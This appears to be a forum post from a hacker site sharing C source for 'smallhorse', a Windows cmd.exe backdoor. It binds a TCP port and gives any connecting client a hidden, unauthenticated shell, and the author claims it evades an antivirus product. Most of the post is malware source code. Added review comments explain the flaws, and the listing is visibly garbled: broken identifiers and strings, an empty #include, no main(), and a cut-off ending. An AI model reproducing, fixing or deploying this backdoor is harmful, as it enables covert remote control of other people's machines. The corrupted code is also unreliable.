A simple cmdshell back door


A simple cmdshell backdoor (Windows TCP bind shell)

Author: Pony / SmallHorse [E.S.T VIP] (whether or not the E.S.T VIP tag is written does not matter). Source: Evil Octal (China). Having some idle time recently, I wrote a simple CMDSHELL backdoor of my own; it also gets past the K anti-virus product. It draws on the T-CMD source code and on earlier related articles in Hacker Defense, and I learned a lot from them along the way. The program is very simple: once it runs it opens TCP port 1983 (or a port you choose) and waits for a client to connect; nc works fine as the client. I had originally planned to have it install itself to start automatically at boot, but for lack of time that part is unfinished. Usage: smallhorse [-p port] — the -p option sets the port to listen on. The source is below; I am posting it so we can learn and improve together. Reviewer's note: as listed, this is an unauthenticated bind shell — the listener binds every interface and hands any peer that connects a cmd.exe running with the program's privileges, with no password or peer check — and the listing as reproduced here has been garbled in transcription (mixed-case identifiers, a bare #include with its target lost, no main() showing the -p parsing), so it does not compile as printed.

QQ: 11189658 E-mail: horse_man@163.com Compiles under VC 6.0 Win2003 through
/* NOTE(review): the #include target was lost in transcription. The Winsock 2 and
 * Win32 calls used below (WSAStartup, CreateThread, CreatePipe, CreateProcess)
 * presumably come from <winsock2.h> / <windows.h> -- confirm against the original post. */
#include
#pragma Comment (lib, "ws2_32.lib")

/* TCP port the listener binds. 1983 is the default; the post says -p overrides it,
 * but the main() that would parse -p is not part of this excerpt. */
INT port = 1983;

/* Per-client worker; defined below (its body is cut off at the end of this excerpt). */
DWORD WINAPI ClientThread (LPVOID LPPAR);

/* Prints the usage banner to stdout. The literals were garbled in transcription
 * (stray quotes, "/ n" for "\n") and are reproduced here exactly as published. */
Void Help () {
    Printf ("/ ****************************** ******** /// n ");
    Printf (" | "|" | "|" | "|" | "" "); printf (" "Printf (" " | Smallhorse [EST] VIP 2005.03 | / N ");
    Printf (" | ******************************* ****** | / n ");
    Printf (" | usage: smallhorse [-p port] | / n ");
    Printf (" | | port: port number to listen on | / n ");
    Printf (" | Default port IS 1983 | / N ");
    Printf (" // ***************************************** ***** // n ");
    return;}

/* Unauthenticated TCP bind shell.
 * Binds INADDR_ANY:port, accepts forever, and hands every accepted socket to
 * ClientThread, which (see below) spawns cmd.exe with its stdio tied to that
 * socket. There is no password, peer check or ACL anywhere on this path: any
 * host that can reach the port gets a shell at this process's privileges.
 * Returns on the first Winsock error; it never returns otherwise. */
void OpenDoor () {// initialize Winsock
    WSADATA wsaData;.
    SOCKET m_socket, acceptClient;
    sockaddr_in Service, Client;
    int ClientSize, i = 0;  /* i is never used */
    int iResult = WSAStartup (MAKEWORD (2, 2), & WSADATA);
    if (IRESULT! = NO_ERROR) RETURN; // Create a socket.
    M_socket = socket (AF_INET , SOCK_STREAM, IPPROTO_TCP);
    /* NOTE(review): socket() reports failure as INVALID_SOCKET, not SOCKET_ERROR;
     * the comparison only works by accident of both being all-ones. */
    if (m_socket == SOCKET_ERROR) return;
    Service.sin_family = AF_INET;
    Service.sin_addr.s_addr = htonl (INADDR_ANY);   /* listen on every interface */
    Service.sin_port = htons (port);
    /* NOTE(review): each early return below leaks m_socket and skips WSACleanup. */
    if (bind (m_socket, (SOCKADDR * ) & Service, sizeof (service)) == Socket_ERROR) RETURN; // bind to the chosen port
    IF (Listen (M_Socket, 5) == Socket_ERROR) Return; // listen with a backlog of 5
    Printf ("/ NSMALLHORSE LISTEN ON Port:% D ... ^ * ^ / N ", Port);
    ClientSize = SizeOf (Client);
    While (1) {Acceptclient = Accept (m_socket, (sockaddr *) & client, & clientsize);
        if (acceptclient == Socket_ERROR) RETURN; // Accept the connection
        printf ("Client Connected./N");
        /* Banner sent to every client before the shell starts. It identifies the tool
         * by name, so it doubles as a network signature for anyone watching the port. */
        char * sendbuf = "/ ************************ ************** /// n / tthanks for use ... / n / tsmallhorse's cmdshell! / n / tgood luck! / n // ********** ****************************** // n / n ";
        send (AcceptClient, Sendbuf, Strlen (Sendbuf), 0) ;
        /* NOTE(review): the thread is given the address of the single loop-local
         * acceptClient, which the next Accept() overwrites; only the Sleep(1000)
         * below keeps the worker from reading a clobbered value, so two quick
         * connections can end up sharing one socket. The thread handle returned
         * by CreateThread is never stored or closed (handle leak per client). */
        If (Createthread (NULL, 0, Clientthread, (LPVOID) & AcceptClient, 0, NULL) == NULL) Printf ("Create Thread Error! / N");
        SLEEP (1000);}
    wsacleanup ();
    return;}

/* Per-client worker: launches cmd.exe from the system directory with its stdin /
 * stdout / stderr redirected through two inheritable pipes, then shuttles bytes
 * between those pipes and the client socket. The body is cut off at the end of
 * this excerpt; the remainder is not shown here. */
DWORD WINAPI ClientThread (LPVOID lpParam) {int ret;
    char Buf [1024];
    HANDLE Rpipe, Wpipe, Wfile, Rfile;
    SOCKET acceptClient = (SOCKET) * (SOCKET *) lpParam;
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof (sa);
    Sa.binherithandle = true;   /* pipe handles must be inheritable for the child */
    sa.lpsecurityDescriptor = null;
    ret = createpipe (& rpipe, & rfile, & sa, 0);
    RET = CreatePipe (& WFile, & WPIPE, & SA, 0); // Establish two pipes, used to receive commands, respectively and displaying results
    STARTUPINFO startinfo;
    GetStartupInfo (& startinfo);
    startinfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    startinfo.hStdInput = Wfile;
    startinfo.hStdError = startinfo.hStdOutput = Rfile;
    startinfo.wShowW indow = SW_HIDE;   /* hidden console window */
    char cmdline [MAX_PATH];
    GetSystemDirectory (cmdline, MAX_PATH);
    strcat (cmdline, ( "// cmd.exe"));   /* "//" is presumably a transcribed "\\" */
    PROCESS_INFORMATION proinfo;
    ret = CreateProcess (cmdline, NULL, NULL, NULL, 1,0 , NULL, NULL, & StartInfo, & Proinfo;
    Unsigned long Byterec;
    While (1) {Sleep (100);
        PeeknamedPipe (Rpipe, BUF, 1024, & BYTEREC, 0, 0);
        if (byterec) {RET = ReadFile (rpipe, BUF, BYTEREC, & BYTEREC, 0);
            if (! RET) Break;
            Ret = Send (AcceptClient, BUF, BYTEREC, 0);
            if (RET <= 0) Break;}
        else {byterec = Recv (AcceptClient, BUF, 1024 , 0);
            if (byterec <=

